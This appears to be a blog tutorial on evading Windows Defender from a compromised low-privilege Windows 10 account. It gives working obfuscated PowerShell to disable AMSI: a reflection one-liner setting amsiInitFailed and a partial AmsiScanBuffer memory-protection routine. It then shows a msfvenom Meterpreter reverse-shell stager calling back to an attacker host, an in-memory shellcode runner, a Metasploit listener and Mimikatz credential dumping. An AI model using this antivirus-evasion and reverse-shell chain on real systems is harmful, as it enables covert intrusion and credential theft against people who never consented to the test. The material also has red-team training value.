Effective Techniques to Circumvent Windows Defender Safeguards
Written on
Chapter 1: Introduction to Bypassing Windows Defender
In this article, we will walk through a method of bypassing the version of Windows Defender that was current at the time of writing, detailing each step thoroughly.
Requirements
To conduct this operation, you will need the following:
- A Windows 10 machine (the target)
- A compromised low-privilege account on the target
- An attacking Linux machine
- Windows Defender running with real-time protection enabled and signatures up to date (as of the time of writing)
Payloads Utilized
```powershell
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
```
Function Definitions
```powershell
# Resolve the address of an exported function (for example kernel32.dll!VirtualAlloc)
# through the GetModuleHandle/GetProcAddress wrappers that System.dll already exposes
# in Microsoft.Win32.UnsafeNativeMethods, so the script needs no P/Invoke declaration
# of its own.
function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].
        Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Collect the GetProcAddress overloads and use the first one.
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
        @($moduleName)), $functionName))
}

# Build a delegate type at run time with the given parameter and return types, so a
# raw function pointer can be wrapped with Marshal.GetDelegateForFunctionPointer and
# invoked like a normal method.
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
        [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}
```
Steps to Bypass Windows Defender
You, as an attacker or penetration tester, have compromised a low-privilege user account on a workstation within the target organization. Observing that Windows Defender is fully operational and up-to-date, your goal is to execute various scripts and enumeration tools to uncover potential privilege escalation vectors, despite the protective measures in place.
Summary of Exploitation
- Bypass the Execution Policy
- Circumvent the Anti-Malware Scanning Interface (AMSI)
- Generate the necessary payload
- Create a PowerShell runner
- Execute the PowerShell runner to launch the final payload
Proof of Concept (PoC)
We will operate under the context of a "testing" user, which is a standard (non-administrative) account on the target machine. Let's first verify the status of Windows Defender on the victim machine, for example with Get-MpComputerStatus, which reports whether real-time protection is enabled and when signatures were last updated:
In this case, Windows Defender is current and fully enabled.
Bypassing Execution Policy
To begin, open a PowerShell terminal on the compromised device and change the Execution Policy to Unrestricted for the current user. The CurrentUser scope needs no administrative rights, and the execution policy is not a security boundary in any case; it only stops scripts from being run by accident, so this step never triggers Defender by itself:
```powershell
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
```
Next, confirm that AMSI is active by typing the bare word amsiutils at the prompt. That string on its own matches a Defender signature, so a red "This script contains malicious content and has been blocked by your antivirus software" error means every command you enter is being submitted to AMSI before it runs.
Disabling AMSI
Now, to bypass AMSI, copy and paste the one-liner from the "Payloads Utilized" section directly into your PowerShell console. It uses reflection to set the private static field amsiInitFailed on System.Management.Automation.AmsiUtils to $true; once that flag is set, the PowerShell host behaves as if AMSI initialisation had failed and stops submitting script content for scanning, in this process only. The [char] concatenations keep the literal strings "AmsiUtils" and "amsiInitFailed" out of the command line, because the plain form is itself signatured. The article also includes a second approach that works on amsi.dll directly. It starts by compiling a small P/Invoke wrapper for the three kernel32 exports it needs:
```powershell
# C# P/Invoke wrapper compiled in memory with Add-Type. Class, variable and
# parameter names are randomised so the snippet does not match string signatures.
$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
```
Then resolve AmsiScanBuffer inside the loaded amsi.dll and make its first bytes writable and executable. Both names are assembled at run time from accented characters, Normalize('FormD') and a regex that strips the combining marks (\p{Mn}), so the strings "amsi.dll" and "AmsiScanBuffer" never appear in the script text. Note that the listing stops at VirtualProtect: changing the page protection by itself does not alter what AmsiScanBuffer does, so this path is only complete once a patch is actually written to that address, which the page does not show.
```powershell
# LoadLibrary("amsi.dll"): the name is built from 'âmsì.dll' by decomposing the
# accented characters (FormD) and removing the combining marks (\p{Mn}).
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
# GetProcAddress(amsi.dll, "AmsiScanBuffer"), same de-accenting trick.
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
# Make the first 5 bytes of AmsiScanBuffer PAGE_EXECUTE_READWRITE (0x40); $p receives
# the old protection value.
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
```
To verify that AMSI has been bypassed, type amsiutils once more. The absence of the red warning confirms that this PowerShell process no longer submits script content to AMSI. The bypass is per process: a new PowerShell window starts with AMSI intact, so everything that follows must be run in this same session.
Generating the Meterpreter Payload
Next, generate a Meterpreter stager on your attacking machine with msfvenom. Port 443 is chosen because outbound HTTPS is usually allowed through egress filtering, which keeps firewall alerts to a minimum; note that reverse_tcp on 443 is still plain TCP, so on a network that inspects traffic windows/x64/meterpreter/reverse_https is the closer fit. The powershell output format emits a [Byte[]] $buf = ... line that drops straight into the runner:
```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=443 EXITFUNC=thread -f powershell
```
Executing the Final Payload
Copy the generated $buf line into your runner, which is assembled from the LookupFunc and getDelegateType helpers in the "Function Definitions" section, and execute it directly in the PowerShell console of the compromised machine, in the same session in which AMSI was bypassed.
Final Steps
Now, start a handler in Metasploit on your attacking machine (exploit/multi/handler with the same payload, LHOST and LPORT you gave to msfvenom). Once it is listening, run the runner in the victim's PowerShell console.
Check your listener now!
And there you have it! You have obtained a Meterpreter session with all of Windows Defender's modules running, in five straightforward steps. What has been evaded is the static and AMSI-based inspection of the script and the stager; the session still lives in a process that behavioural monitoring or an EDR could flag, so treat it as the starting point for the enumeration described above rather than a blanket bypass.
Running Mimikatz
To further test your success, run Mimikatz from the Meterpreter session by loading the kiwi extension (load kiwi), then a command such as creds_all. Mimikatz dropped to disk is blocked by Defender, but the extension runs in memory. Keep in mind that you are still a low-privilege user: reading LSASS requires administrator or SYSTEM rights, so the credential-dumping commands will fail until you have escalated, which is exactly what the enumeration described above is for.